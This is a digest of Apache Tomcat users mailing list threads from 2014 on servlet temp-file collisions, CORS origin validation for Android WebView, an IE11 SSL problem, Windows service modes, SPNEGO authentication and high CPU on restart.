Re: Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Sevlets outputting the audio output from the previous runs of the program instead of the current run.

[Konstantin Kolinko]

2014-05-01 2:00 GMT+04:00 Hayward, Leigh :
> OK so I just spent an age trying to push my project to a GitHub repositry but
> I think i must just be too tired to use my brain correctly.
> Eventally gave up and just pasted my servlet into a file there.
> https://github.com/Leighbee13/RUNTHIS/tree/master
> Let me know if this works!

An interesting servlet...

The problem is that the names of your temporary files are constant ones.

So if several requests are coming at the same time. several users'
data will be written into the same file.

If a user hasn't completed downloading her file, and another requests
comes in,  the "finished.wav" file will be overwritten with new data.

Best regards,
Konstantin Kolinko

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Sevlets outputting the audio output from the previous runs of the program instead of the current run.

[Hayward, Leigh]

I Prematurely sent that one, not even sure i had much more 
to add, probably just more eternal gratitude to chris. Outlook 
has completely screwed up the formatting of this email so i 
don't know whats what and whats where.I'm shaking with 
stress and tiredness so i'm going to go home, sleep and find 
a way to force another email program onto this computer 
tomorrow.

Thanks to anyone taking the time to read this,
Leigh

From: Hayward, Leigh 
Sent: 30 April 2014 15:31
To: users@tomcat.apache.org
Subject: Tomcat 8.0.3.0 getting never before seen by google Illegal State 
Exception. Sevlets outputting the audio output from the previous runs of the 
program instead of the current run.

Hello all,

My Java EE web application takes in multiple audio inputs and outputs
them as a single wav file via an application/octet stream.

It seemingly randomly works correctly (i.e. outputting the correctly
manipulated audio file) but sometimes, the file from a previous
run of the program is output and I get one of these errors:

SEVERE [http-nio-8084-exec-30] 
org.apache.catalina.loader.WebappClassLoader.clearReferencesThreads The web 
application [/MyApp] is still processing a request that has yet to finish. This 
is very likely to create a memory leak. You can control the time allowed for 
requests to finish by using the unloadDelay attribute of the standard Context 
implementation.

and to me seemingly random numbers of these errors:

"SEVERE [http-nio-8084-exec-87] 
org.apache.coyote.http11.AbstractHttp11Processor.process Error processing 
request java.lang.IllegalStateException: The resources may not be accessed if 
they are not currently started?"

The files always upload correctly to my filesystem, but something is
going wrong when I try to access them in order to process them.

Also when it is downloading the file it appears to the user
to be several MB long despite the file that is output being only a few
thousand KB.

Sometimes when it doesn't work it does not produce these errors, but it
never produces these errors when it works correctly.

I have googled it but there's no reference to the second kind of error
anywhere on the web aside from svn commits by tomcat developers,
so while I am a total newbie to mailing lists, after exhausting
stackoverflow this seemed like the only place to turn to. I'm
developing a java EE web application in Netbeans using Tomcat
8.0.3.0 on a windows 7 operating system.

The web application is very basic and allows users to upload files via a
multipart html form. This then posts to a servlet which first uploads these
files to the programs file system and then accesses them, concatenates
them together and saves them back on the file system.
It's better explained by this diagram http://imgur.com/Oacd4gq
Could it be that the files are not being uploaded fully before they are
being accessed?

Sorry if this email looks like shit i'm being forced to use outlook
by my university!

Thank you for taking the time to read my post.

Best wishes to you all regardless,
Leigh








-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Sevlets outputting the audio output from the previous runs of the program instead of the current run.

[Hayward, Leigh]

OK so I just spent an age trying to push my project to a GitHub repositry but
I think i must just be too tired to use my brain correctly. 
Eventally gave up and just pasted my servlet into a file there.
https://github.com/Leighbee13/RUNTHIS/tree/master
Let me know if this works!
>
>From: Christopher Schultz 
>Sent: 30 April 2014 20:13
>To: Tomcat Users List
>Subject: Re: Tomcat 8.0.3.0 getting never before seen by google Illegal State 
>Exception. Sevlets outputting the >audio output from the previous runs of the 
>program instead of the current run.

>-BEGIN PGP SIGNED MESSAGE-
>>Hash: SHA256

>Leigh,

>On 4/30/14, 1:55 PM, Hayward, Leigh wrote:
>> Hi Chris, Thank you so much for the speedy response . I have no
>> idea what i'm doing formatting wise. Pretty much just wrapping and
>> indenting all by hand  so forgive me if it's a mess!
>>
>>>  From: Christopher
>>> Schultz  Sent: 30 April 2014 17:58
>>> To: Tomcat Users List Subject: Re: Tomcat 8.0.3.0 getting never
>>> before seen by google Illegal State Exception. Sevlets outputting
>>> the >audio output from the previous runs of the program instead
>>> of the current run.
>>
>> Leigh,
>>
>> On 4/30/14, 10:31 AM, Hayward, Leigh wrote:
 My Java EE web application takes in multiple audio inputs
 and outputs them as a single wav file via an
 application/octet stream.
>
> Like a mixer?
>
>> Like a concatenator, adds songs one after the other into one long
>> song. It then overlays (mixes) another file into it containing
>> audio cues on top of the concatenated music. But the issue is
>> definitely arising at the concatenation phase.

>Okay. Are you saying that you don't get the output file you are
>expecting given a set of input files, even when under test conditions
>(a single request)?

>Do you accept all files at once for upload and return a single
>concatenated file, or do you upload the files one at a time and then
>request the completed file at the end of the workflow?

Yes i'm not getting the output I expect given the inputs, i'm getting 
the output that would have happened with a previous input.

Yes the form has an unknown number of file inputs and they are 
all submitted at once.

>> I have the audio writing to a file after each song is added in
>> the concatenation phase so that i can audibly debug and the
>> concatenator is definitely struggling to find the uploaded
>> files.

>What do you mean "struggling to find the uploaded files"? Your file
>upload library should be readily giving the files to you.

By struggling I just mean that the concatenate method is where the 
incorrect audio output begins being produced instead of the correct 
one. At least as far as i can tell from my 

 It seemingly randomly works correctly (i.e. outputting the
 correctly manipulated audio file) but sometimes, the file
 from a previous run of the program is output and I get one of
 these errors:

 SEVERE [http-nio-8084-exec-30]
 org.apache.catalina.loader.WebappClassLoader.clearReferencesThreads


The web application [/MyApp] is still processing a request that has
 yet to finish. This is very likely to create a memory leak.
 You can control the time allowed for requests to finish by
 using the unloadDelay attribute of the standard Context
 implementation.

 and to me seemingly random numbers of these errors:

 "SEVERE [http-nio-8084-exec-87]
 org.apache.coyote.http11.AbstractHttp11Processor.process
 Error processing request java.lang.IllegalStateException: The
 resources may not be accessed if they are not currently
 started?"
>
>
> These kinds of things are almost always due to storing of a request
> or response option in some kind of structure that survives past the
> end of a particular request.
>
> Can you explain how you build the response -- specifically
> involving any non-standard threading you may do?
>
>> The response is built in a method called finish which is called
>> in doPost like this :
>
>> finish(req, res); In finish I make a printwriter I set response
>> content type to "application/octet-stream", set the header
>> "Content-Disposition" to "attachment; filename=finished.wav" I
>> make a FileInputStream of the finished filepath Then I set the
>> header content length to the length of the finished file. then I
>> while loop the fileInputStream into the printwriter Then I close
>> the FIS.

>That seems fairly straightforward. Why are you bothering with a
>PrintWriter? The existing response OutputStream ought to be good
>enough to pump bytes through. How are you pumping the bytes? Just a
>simple, locally-declared byte array?

The online examples use printwriters so I used a printwriter.
I've now changed it to the res's own output stream but it made no 
difference to the output.

I'm just using:
while ((i = fileInputStream.read()) != -1) {
out.write(i);
}  

Re: CORS issue with Tomcat and Android Webview

[Terence M. Bandoian]

On 4/28/2014 3:21 PM, Konstantin Kolinko wrote:

2014-04-28 23:44 GMT+04:00 Terence M. Bandoian :

On 4/27/2014 11:36 AM, Konstantin Kolinko wrote:

2014-04-27 0:50 GMT+04:00 Terence M. Bandoian :

On 4/26/2014 1:13 AM, Ankit Singhal wrote:

On Sat, Apr 26, 2014 at 12:53 AM, Terence M. Bandoian

Hi, Ankit-

Where did you see  documented?  I see an 
named
cors.allowed.origins on the Tomcat web site:

https://tomcat.apache.org/tomcat-7.0-doc/config/filter.html#CORS_Filter

In any case, I agree that if allowed origins is set to "*", all CORS
requests should be allowed.  As I understand it, the W3C spec only
requires
that the Origin header exists:

http://www.w3.org/TR/cors/#resource-processing-model

It also states that it is acceptable for Origin headers to always match
the
list of allowed origins when the list is "unbounded".


1. From a quick reading, I do not see any syntax for that lists
besides exact case-sensitive matches.

http://tools.ietf.org/html/rfc6454#section-7
says that the syntax of origin header is

 serialized-origin   = scheme "://" host [ ":" port ]
 ; , ,  from RFC 3986

Nothing says that "host" can be omitted.

http://tools.ietf.org/html/rfc6454#section-6.1
Per Sections 6.1 and 6.2 the correct serialized value of such
"file://" origin will be "null".

2. Some form of sanity check must be present,
because the origin header value is sent back to client and as such can
be abused.

3. That said,
I think that CorsFilter.isValidOrigin(String) can be patched to
a) Be more strict to the specified syntax  (and not just allow any URI)
(Not actually necessary, but it will allow to reject non-conforming
clients).

b) Specifically white-list the "null" origin.

c) Specifically white-list a "file://" origin,  with notion that that
is a bug in certain Android versions


Maybe this is a good case to submit a bug report or a patch.

Agreed.

Best regards,
Konstantin Kolinko



Hi, Konstantin-

I agree there is value in validating the origin header value and with your
interpretation of the IETF origin header specification.  I was referring to:

 http://www.w3.org/TR/cors/#resource-requests

which includes:

 1. If the Origin header is not present terminate this set of steps. The
request is outside the scope of this specification.

 2. If the value of the Origin header is not a case-sensitive match for
any of the values in list of origins, do not set any additional headers and
terminate this set of steps.

 Note: Always matching is acceptable since the list of origins can be
unbounded.

The solution you propose makes sense to me and I think will work although
I'm a little unclear about a).  Do you mean adding a test for a null host
value?

In a) I meant that  on Origin header is either "null" (4 characters literally),
or  "scheme "://" host [ ":" port ]".

It is not an URI. So in theory the check can be more strict, that
there is no "path", "query", "anchor" or whatever additional URI
components can be there.

(Though I see no real worth in being that strict. A small worth is to
encourage clients to behave correctly, if there are some misbehaving
ones).

Best regards,
Konstantin Kolinko



One alternative solution might be to reduce origin header validation to 
checking for invalid characters only. It may be a little sloppy but 
would eliminate the need to add to a hardcoded whitelist for every 
client that doesn't comply with the origin header spec.


Another would be to add a cors.allowed.invalidorigins initialization 
parameter. This would allow for strict validation of origin headers with 
configurable whitelisting of invalid values.


-Terence Bandoian

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: Setup Issue tomcat 6 SLES 11 SSL

[Martin Gainty]

> Date: Wed, 30 Apr 2014 14:01:11 -0500
> From: tere...@tmbsw.com
> To: users@tomcat.apache.org
> Subject: Re: Setup Issue tomcat 6 SLES 11 SSL
> 
> On 4/30/2014 9:02 AM, Christopher Schultz wrote:
> > -BEGIN PGP SIGNED MESSAGE-
> > Hash: SHA256
> >
> > Vincent,
> >
> > On 4/29/14, 4:24 PM, Vincent T. DiScipio wrote:
> >> I have setup tomcat 6 on SLES 11 and secured the instance with an
> >> external certificate if authority.  The following is occurring
> >> from the same machine using both IE and Firefox:
> >>
> >> http://servername.wooster.edu:8080works for both IE11 and
> >> Firefox 29 and displays the index.html
> >>
> >> https://servername.wooster.edu:8443  works for Firefox 29 and
> >> displays the index.html
> >>
> >> https://servername.wooster.edu:8443  does not work for IE11v
> >> displays "This page can't be displayed"
> >>
> >> I have changed the logging level to finest and do not see any
> >> errors in the catalina.out.
> >>
> >> Thoughts?  I have the same setup on another server and I believe
> >> the files and permission levels are set the same.
> > What does your SSL configuration look like?
> >
> > You could also use either sslscan from the CLI or go to
> > https://www.ssllabs.com/ssltest/ and use their online tool to examine
> > the site from the outside.
> >
> > Perhaps you have a combination of protocols and ciphers that MSIE
> > can't handle.
> >
> > - -chris
> 
> 
> If the option is available, you might also try disabling the IE 
> "friendly" error messages.  I'm not sure about IE 11, but it seems like 
> previous versions displayed an error message with a reddish background 
> if they were unable to authenticate a server with a given SSL 
> certificate.  Was a certificate authority bundle supplied with the SSL 
> certificate?  If so, is it installed and configured?  Were the SSL 
> certificates on the both servers issued by the same company?
> 
> -Terence Bandoian
> 
MG>IE / Internet Options / Tools / Content / Certificates / Import
MG>Import the provided certficate into CA Trusted Root

> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
> 
  

Re: Difference between Tomcat Window Service mode ?

[Konstantin Kolinko]

2014-05-01 1:10 GMT+04:00 Sebastien Tardif
:
> What is the difference between Tomcat Window Service mode ?
>
>
>
> Which one is better?
>
>
>
> I believe one of them is more “friendly” with JConsole so that the Tomcat 
> instance is listed as a list of JVM running locally?

No. Not at all.

>
> Extract from 
> http://tomcat.apache.org/tomcat-7.0-doc/windows-service-howto.html
> --StartMode
>
> executable
>
> Can one of jvm, java or exe
>


Those are Service Wrapper modes (Apache Commons Daemon jsvc).
It can wrap different programs and can start JRE in different ways.

http://commons.apache.org/proper/commons-daemon/jsvc.html

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Difference between Tomcat Window Service mode ?

[Sebastien Tardif]

What is the difference between Tomcat Window Service mode ?



Which one is better?



I believe one of them is more “friendly” with JConsole so that the Tomcat 
instance is listed as a list of JVM running locally?



Extract from http://tomcat.apache.org/tomcat-7.0-doc/windows-service-howto.html
--StartMode

executable

Can one of jvm, java or exe

Re: Need How-To Authenticate with built-in SPNEGO and Authorize with a DataSourceRealm or JAAS database role lookup.

[Felix Schumacher]

On 29. April 2014 20:28:14 MESZ, "Troyer, Ron"  
wrote:
>Hi,
>
>I am new to Tomcat and need some guidance.
>
>I am trying to setup a Tomcat 7.0.53 instance on a Windows 7 box, using
>JDK 1.7_51.  
>
>I have read the section of the documentation about Windows
>Authentication, but I am confused at this point.  From the
>documentation I have been unable to determine how to configure my
>realms and JAAS to authenticate with SPNEGO and authorize with a
>database lookup.  For one thing I don't understand the difference
>between the krb5 initiate and accept entries in the example JAAS
>configuration.  Looking at the documentation for the Realms, it looks
>like I want to specify a JAASRealm of some sort.  From other things I
>have done, I think I need to make the Krb5LoginModule as requisite and
>use some other login module to do the DB lookup for the roles.

You can use the DataSourceRealm as written in the windows authentication 
section.
Tomcat will use the user and role definitions, but ignore the passwords.

Regards
 Felix
>
>I am sure someone has had to do this in the past, and I am hoping they
>can show me how to do it.
>
>
>
>-
>To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
>For additional commands, e-mail: users-h...@tomcat.apache.org


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: Setup Issue tomcat 6 SLES 11 SSL

[Vincent T. DiScipio]

Terence, 

I poked around in the configuration file and knew it was something I did to 
screw it up.  I just scrapped the install and started from fresh. 

Thanks for the reply

Vince DiScipio
Director of Digital Infrastructure
The College of Wooster
P - 330-263-2612
F - 330-263-2666 

-Original Message-
From: Terence M. Bandoian [mailto:tere...@tmbsw.com] 
Sent: Wednesday, April 30, 2014 3:01 PM
To: Tomcat Users List
Subject: Re: Setup Issue tomcat 6 SLES 11 SSL

On 4/30/2014 9:02 AM, Christopher Schultz wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA256
>
> Vincent,
>
> On 4/29/14, 4:24 PM, Vincent T. DiScipio wrote:
>> I have setup tomcat 6 on SLES 11 and secured the instance with an 
>> external certificate if authority.  The following is occurring from 
>> the same machine using both IE and Firefox:
>>
>> http://servername.wooster.edu:8080works for both IE11 and
>> Firefox 29 and displays the index.html
>>
>> https://servername.wooster.edu:8443  works for Firefox 29 and 
>> displays the index.html
>>
>> https://servername.wooster.edu:8443  does not work for IE11v displays 
>> "This page can't be displayed"
>>
>> I have changed the logging level to finest and do not see any errors 
>> in the catalina.out.
>>
>> Thoughts?  I have the same setup on another server and I believe the 
>> files and permission levels are set the same.
> What does your SSL configuration look like?
>
> You could also use either sslscan from the CLI or go to 
> https://www.ssllabs.com/ssltest/ and use their online tool to examine 
> the site from the outside.
>
> Perhaps you have a combination of protocols and ciphers that MSIE 
> can't handle.
>
> - -chris


If the option is available, you might also try disabling the IE "friendly" 
error messages.  I'm not sure about IE 11, but it seems like previous versions 
displayed an error message with a reddish background if they were unable to 
authenticate a server with a given SSL certificate.  Was a certificate 
authority bundle supplied with the SSL certificate?  If so, is it installed and 
configured?  Were the SSL certificates on the both servers issued by the same 
company?

-Terence Bandoian


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: High CPU Usage on restarting the Tomcat 7.0.39

[srinivas rapolu]

#1. Sorry, was not aware of attachments. Uploaded screenshot at:
http://www.imageurlhost.com/images/souyh4ks07ber4kwu9u.png

#2. Connector details from server.xml



On Wed, Apr 30, 2014 at 3:50 PM, Konstantin Kolinko
wrote:

> 2014-04-30 23:41 GMT+04:00 srinivas rapolu :
> > We are using Tomcat 7.0.39 ((java version "1.7.0_25"), and Sometimes CPU
> > goes high when we restart the TOMCAT.
> >
> > We have to stop the Tomcat in-order to release the release resources and
> > again restarting the Tomcat fixes the problem.
> >
> > On profiling, found that Invocations on
> > sum.rmi.transport.tcp.TCPTransport$ConnectionHandler.run() keep on
> getting
> > increased and occupy more CPU.
> >
> > Please find attachment for more information. Any help/clue on this is
> > appreciated.
> >
>
>
> 1. Attachments are not allowed on this mailing list. The mailing list
> server will remove them.
>
> http://tomcat.apache.org/lists.html#tomcat-users
> -> 7.
>
> 2. What connector implementation are you using and how it is configured?
>
> 3. Take a thread dump when that issue happens.
>
>
> http://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>
> 4.
> http://wiki.apache.org/tomcat/HowTo/FasterStartUp
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>

Re: High CPU Usage on restarting the Tomcat 7.0.39

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Srinivas,

On 4/30/14, 3:41 PM, srinivas rapolu wrote:
> We are using Tomcat 7.0.39 ((java version "1.7.0_25"), and
> Sometimes CPU goes high when we restart the TOMCAT.
> 
> We have to stop the Tomcat in-order to release the release
> resources and again restarting the Tomcat fixes the problem.
> 
> On profiling, found that Invocations on 
> sum.rmi.transport.tcp.TCPTransport$ConnectionHandler.run() keep on
> getting increased and occupy more CPU.
> 
> Please find attachment for more information. Any help/clue on this
> is appreciated.

Your attachment was stripped. Please paste any information inline.

- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQIcBAEBCAAGBQJTYVQQAAoJEBzwKT+lPKRY4SgP/3DH8jB76F6jL7NvJF8Hgk7J
zXUVvDdButoxwPCjnkr6JgFdS0dYqjclZ6ux5iez82Ty0JoGP1zsnealGj9xoYAs
dtYRvd6eMY2XyF9NTfLge+nUStK+ukvVUOPe3UKcLOxBFZ2RI0YkzJk1ncfC0vm8
hiG0Fk/EF9lFaT+CTZeX+Gr8QH5Xzxz4JK7FIW5HNbw1vz6iWywSLOV8qtXWtGL3
g7KcQKEh+FWyA0rxU+miEPEJgM2DvrH9AaHlafs/MB19jEjwscYCWGp0i8UTf+zN
0EXKIMC1S187DvkIScj0mGqaoYqjAMDHEVpRd8+JRDdMc/M1kdXSNKmMCu0kviGK
bn30ctr1wuz8qzl4ROVrmqf4sdC+5Q+20vnC6TFNIJZS9DymkpfFBkaGLMk3h9Ng
4Ec2BrRxZx8p8UhPCJPdIDgBUBZwmY9HSUtoP9Nagcs8r6EGRJYeglnwdo0s6ADy
z0eZCK7qFCnYoZMHQHU8fald4RgNUXaqjXsY+mHgxCCmpMj7YajK3ubPYP90uOsf
1lN026Kclq0Zp8W6RQsE4/pbXndsNAYQJjnFRW2YXZTGTB/am84oszmkmVihPHlS
tMPvm9mPy38wR0awZ79jFdaOdRY9k3hj4p63GxcfyLPi22EYQUUKqCq7//Hnyk3j
SzrVz8PsO4XH23lS7cXr
=fpgo
-END PGP SIGNATURE-

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: High CPU Usage on restarting the Tomcat 7.0.39

[Konstantin Kolinko]

2014-04-30 23:41 GMT+04:00 srinivas rapolu :
> We are using Tomcat 7.0.39 ((java version "1.7.0_25"), and Sometimes CPU
> goes high when we restart the TOMCAT.
>
> We have to stop the Tomcat in-order to release the release resources and
> again restarting the Tomcat fixes the problem.
>
> On profiling, found that Invocations on
> sum.rmi.transport.tcp.TCPTransport$ConnectionHandler.run() keep on getting
> increased and occupy more CPU.
>
> Please find attachment for more information. Any help/clue on this is
> appreciated.
>


1. Attachments are not allowed on this mailing list. The mailing list
server will remove them.

http://tomcat.apache.org/lists.html#tomcat-users
-> 7.

2. What connector implementation are you using and how it is configured?

3. Take a thread dump when that issue happens.

http://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F

4.
http://wiki.apache.org/tomcat/HowTo/FasterStartUp

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

High CPU Usage on restarting the Tomcat 7.0.39

[srinivas rapolu]

We are using Tomcat 7.0.39 ((java version "1.7.0_25"), and Sometimes
CPU goes high when we restart the TOMCAT.

We have to stop the Tomcat in-order to release the release resources
and again restarting the Tomcat fixes the problem.

On profiling, found that Invocations on
sum.rmi.transport.tcp.TCPTransport$ConnectionHandler.run() keep on
getting increased and occupy more CPU.

Please find attachment for more information. Any help/clue on this is
appreciated.

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Sevlets outputting the audio output from the previous runs of the program instead of the current run.

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Leigh,

On 4/30/14, 1:55 PM, Hayward, Leigh wrote:
> Hi Chris, Thank you so much for the speedy response . I have no
> idea what i'm doing formatting wise. Pretty much just wrapping and
> indenting all by hand  so forgive me if it's a mess!
> 
>>  From: Christopher
>> Schultz  Sent: 30 April 2014 17:58 
>> To: Tomcat Users List Subject: Re: Tomcat 8.0.3.0 getting never
>> before seen by google Illegal State Exception. Sevlets outputting
>> the >audio output from the previous runs of the program instead
>> of the current run.
> 
> Leigh,
> 
> On 4/30/14, 10:31 AM, Hayward, Leigh wrote:
 My Java EE web application takes in multiple audio inputs
 and outputs them as a single wav file via an
 application/octet stream.
> 
> Like a mixer?
> 
>> Like a concatenator, adds songs one after the other into one long
>> song. It then overlays (mixes) another file into it containing 
>> audio cues on top of the concatenated music. But the issue is 
>> definitely arising at the concatenation phase.

Okay. Are you saying that you don't get the output file you are
expecting given a set of input files, even when under test conditions
(a single request)?

Do you accept all files at once for upload and return a single
concatenated file, or do you upload the files one at a time and then
request the completed file at the end of the workflow?

>> I have the audio writing to a file after each song is added in
>> the concatenation phase so that i can audibly debug and the 
>> concatenator is definitely struggling to find the uploaded
>> files.

What do you mean "struggling to find the uploaded files"? Your file
upload library should be readily giving the files to you.

 It seemingly randomly works correctly (i.e. outputting the 
 correctly manipulated audio file) but sometimes, the file
 from a previous run of the program is output and I get one of
 these errors:
 
 SEVERE [http-nio-8084-exec-30] 
 org.apache.catalina.loader.WebappClassLoader.clearReferencesThreads

 
The web application [/MyApp] is still processing a request that has
 yet to finish. This is very likely to create a memory leak.
 You can control the time allowed for requests to finish by
 using the unloadDelay attribute of the standard Context
 implementation.
 
 and to me seemingly random numbers of these errors:
 
 "SEVERE [http-nio-8084-exec-87] 
 org.apache.coyote.http11.AbstractHttp11Processor.process
 Error processing request java.lang.IllegalStateException: The
 resources may not be accessed if they are not currently
 started?"
> 
> 
> These kinds of things are almost always due to storing of a request
> or response option in some kind of structure that survives past the
> end of a particular request.
> 
> Can you explain how you build the response -- specifically
> involving any non-standard threading you may do?
> 
>> The response is built in a method called finish which is called
>> in doPost like this :
> 
>> finish(req, res); In finish I make a printwriter I set response
>> content type to "application/octet-stream", set the header
>> "Content-Disposition" to "attachment; filename=finished.wav" I
>> make a FileInputStream of the finished filepath Then I set the
>> header content length to the length of the finished file. then I
>> while loop the fileInputStream into the printwriter Then I close
>> the FIS.

That seems fairly straightforward. Why are you bothering with a
PrintWriter? The existing response OutputStream ought to be good
enough to pump bytes through. How are you pumping the bytes? Just a
simple, locally-declared byte array?

You should remember to flush and/or close the output stream as well. I
think Tomcat will flush and close this for you, but you might want to
check to see if it changes anything.

>> I have not touched threading since it looks terrifying. I did
>> experiment with making the servlet singlethreaded since I thought
>> it could have something to do with threads (bad practice I know)
>> but that did nothing to help.

Are you using any variables that have been declared at the class
level? Everything you do with a request should be declared inside of
the service method (or doPost, etc.) or a parameter passed-into a
utility method. Don't store references to request, response, etc.
outside of the thread of execution that is handling that request.

If single-threading fixes your problem (sounds like it doesn't), then
you have broken the above rule.

 The files always upload correctly to my filesystem, but
 something is going wrong when I try to access them in order
 to process them.
> 
> What mechanism do you use for upload?
> 
>> My servlet has a location set in the @multipartconfig tag that is
>> where all files are saved to and retrieved from. I am getting the
>> Parts from the request then iterating through them, for each part
>> that

Re: Setup Issue tomcat 6 SLES 11 SSL

[Terence M. Bandoian]

On 4/30/2014 9:02 AM, Christopher Schultz wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Vincent,

On 4/29/14, 4:24 PM, Vincent T. DiScipio wrote:

I have setup tomcat 6 on SLES 11 and secured the instance with an
external certificate if authority.  The following is occurring
from the same machine using both IE and Firefox:

http://servername.wooster.edu:8080works for both IE11 and
Firefox 29 and displays the index.html

https://servername.wooster.edu:8443  works for Firefox 29 and
displays the index.html

https://servername.wooster.edu:8443  does not work for IE11v
displays "This page can't be displayed"

I have changed the logging level to finest and do not see any
errors in the catalina.out.

Thoughts?  I have the same setup on another server and I believe
the files and permission levels are set the same.

What does your SSL configuration look like?

You could also use either sslscan from the CLI or go to
https://www.ssllabs.com/ssltest/ and use their online tool to examine
the site from the outside.

Perhaps you have a combination of protocols and ciphers that MSIE
can't handle.

- -chris



If the option is available, you might also try disabling the IE 
"friendly" error messages.  I'm not sure about IE 11, but it seems like 
previous versions displayed an error message with a reddish background 
if they were unable to authenticate a server with a given SSL 
certificate.  Was a certificate authority bundle supplied with the SSL 
certificate?  If so, is it installed and configured?  Were the SSL 
certificates on the both servers issued by the same company?


-Terence Bandoian


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CORS issue with Tomcat and Android Webview

[Terence M. Bandoian]

On 4/29/2014 3:48 AM, Jose María Zaragoza wrote:

2014-04-29 0:38 GMT+02:00 Terence M. Bandoian :

On 4/28/2014 5:32 PM, Terence M. Bandoian wrote:

On 4/28/2014 3:08 PM, Jose María Zaragoza wrote:

2014-04-28 21:55 GMT+02:00 Terence M. Bandoian :

On 4/26/2014 6:56 AM, Jose María Zaragoza wrote:

2014-04-26 13:16 GMT+02:00 Martin Gainty :

Date: Sat, 26 Apr 2014 11:43:05 +0530
Subject: Re: CORS issue with Tomcat and Android Webview
From: ankising...@gmail.com
To: users@tomcat.apache.org

On Sat, Apr 26, 2014 at 12:53 AM, Terence M. Bandoian
wrote:


On 4/24/2014 11:16 PM, Ankit Singhal wrote:


Hi

I did more research on this and figure out the issue.If you see the
headers
from Android and look into Origin Header.

Origin: file://

Tomcat CORS filter tries to validate the URI in Origin header and
considers
"file://" as an invalid URI and returns back 403.

I have applied * params. So
shouldn't
CORS
filter honor this ?

I agree that Client also has the problem , but still server should
also
allow...


Hi:

I'm watching this flowchart
https://tomcat.apache.org/tomcat-7.0-doc/images/cors-flowchart.png

and I wonder if Tomcat 7 checks if the request received belongs to the
right type.
I mean, if browser sends a simple request ( eg. POST + application/xml
content-type header )
WC3 spec says that request should be a preflight request  , does
Tomcat check this case ?



Regards


Hi, Jose-

I don't see where the W3C spec requires a preflight request for simple
requests.


-Terence Bandoian


Sorry, I meant non-simple request.
For example, if I perform a cross-domain POST request (within
application/xml content-type header ),
I guess that a preflight request is required , right ?
What happens, if it's not sent , on Tomcat? Should it check it ?

Regards



Hi, Jose-

I don't see in the W3C spec where preflight requests are required at all.
Can you point me to where you've found that?

-Terence Bandoian



I meant to say I don't see where the W3C spec requires preflight requests to
be sent.

According to

http://www.w3.org/TR/cors/#simple-cross-origin-request
Cross-Origin Request with Preflight
[
Go to the next step if the following conditions are true. *Otherwise,
make a preflight request.*

- For request method there either is a method cache match or it is a
simple method and the force preflight flag is unset.
- For every header of author request headers there either is a header
cache match for the field name or it is a simple header.
/]

So, I understand that if I make a POST request within application/xml
content-type header, it's a simple method but Content-type:
application/xml is not a simple header, according to
http://www.w3.org/TR/cors/#simple-method
I understand that client must to make a preflight request

Maybe I'm wrong


Regards



Hi, Jose,

I see that now but the logic behind it is a little confusing.  In 
particular, the following sentence at the beginning of the section you 
referenced is not clear to me:


"To protect resources against cross-origin requests that could not 
originate from certain user agents before this specification existed a 
preflight request is made to ensure that the resource is aware of this 
specification."


Are servers required to perform any actions related to preflight 
requests other than responding appropriately to them?


-Terence Bandoian


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Sevlets outputting the audio output from the previous runs of the program instead of the current run.

[Hayward, Leigh]

Hi Chris,
Thank you so much for the speedy response .
I have no idea what i'm doing formatting wise. Pretty much 
just wrapping and indenting all by hand  so forgive me if
it's a mess!

>
>From: Christopher Schultz 
>Sent: 30 April 2014 17:58
>To: Tomcat Users List
>Subject: Re: Tomcat 8.0.3.0 getting never before seen by google Illegal State 
>Exception. Sevlets outputting the >audio output from the previous runs of the 
>program instead of the current run.

>-BEGIN PGP SIGNED MESSAGE-
>Hash: SHA256

>Leigh,

>On 4/30/14, 10:31 AM, Hayward, Leigh wrote:
>> My Java EE web application takes in multiple audio inputs and
>> outputs them as a single wav file via an application/octet stream.

>Like a mixer?

Like a concatenator, adds songs one after the other into one
long song. It then overlays (mixes) another file into it containing  
audio cues on top of the concatenated music. But the issue is 
definitely arising at the concatenation phase.
